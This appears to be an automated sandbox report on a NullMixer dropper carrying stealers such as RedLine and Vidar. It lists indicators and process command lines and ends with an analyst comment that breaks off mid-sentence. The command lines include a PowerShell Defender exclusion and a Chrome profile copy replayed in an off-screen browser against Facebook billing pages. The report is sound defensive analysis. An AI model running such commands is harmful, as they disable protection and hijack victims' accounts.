Analysis Overview
SHA256: bdf727b2ac0b42a955c4744bf7768cbb9fa67167321e4fb5639ee5529ccbcfa4
Threat Level: Known bad
The file 9c7f6d97e7dc008682f6761744de856a_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
RedLine payload
RedLine
Redline family
Privateloader family
Socelars family
Sectoprat family
SectopRAT
Vidar family
Socelars payload
PrivateLoader
SectopRAT payload
Vidar
Socelars
Nullmixer family
NullMixer
Vidar Stealer
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
Checks computer location settings
Reads user/profile data of web browsers
Checks installed software on the system
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Looks up geolocation information via web service
Drops Chrome extension
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Enumerates system info in registry
Uses Task Scheduler COM API
Analysis: static1
Detonation Overview
Reported: 2024-11-25 15:56
Signatures
Unsigned PE
Analysis: behavioral2
Detonation Overview
Submitted: 2024-11-25 15:56
Reported: 2024-11-25 15:59
Platform: win10v2004-20241007-en
Max time kernel: 143s
Max time network: 149s
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
Vidar
Vidar family
Vidar Stealer
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\438dc1669.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4980 set thread context of 912 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\aae15d524bc2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS00343E47\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc385231.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f65dc44f3b4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 745d0d3ff9cc2c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bf2e8642ac5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c b5203513d7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a6168f1f756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a070c3838.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 438dc1669.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe
5f9a813bc385231.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\745d0d3ff9cc2c3.exe
745d0d3ff9cc2c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\f65dc44f3b4.exe
f65dc44f3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\aae15d524bc2.exe
aae15d524bc2.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\bf2e8642ac5.exe
bf2e8642ac5.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\b5203513d7.exe
b5203513d7.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a6168f1f756.exe
a6168f1f756.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\a070c3838.exe
a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\438dc1669.exe
438dc1669.exe
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc38523010.exe
5f9a813bc38523010.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2516 -ip 2516
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 568
C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe
"C:\Users\Admin\AppData\Local\Temp\7zS00343E47\5f9a813bc385231.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4632 -ip 4632
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732550209 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff91229cc40,0x7ff91229cc4c,0x7ff91229cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2080,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2252,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3188,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3604 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3944,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4756,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5084,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3976,i,16806179191501377450,16837608131657671582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2040 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
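Two things in the process list above deserve more attention than the signature names give them. First, the RunOnce value flagged as "Adds Run key to start application" (wextract_cleanup0 = rundll32.exe advpack.dll,DelNodeRunDLL32 "...\IXP000.TMP\") is the standard cleanup entry written by the IExpress/wextract self-extractor: it deletes the extraction directory at next logon and does not relaunch anything, so it is a packaging tell rather than payload persistence. Second, the chain setup.exe -> taskkill /f /im chrome.exe -> xcopy of the whole Chrome "User Data" directory into Temp -> chrome.exe started at --window-position=-50000,-50000 on that copied profile against Facebook Ads Manager billing URLs is the actionable behaviour: the victim's live cookies are replayed in an off-screen browser. The Defender exclusion added through powershell.exe Add-MpPreference -ExclusionPath, and winnetdriv.exe running under C:\Windows with setup.exe's command 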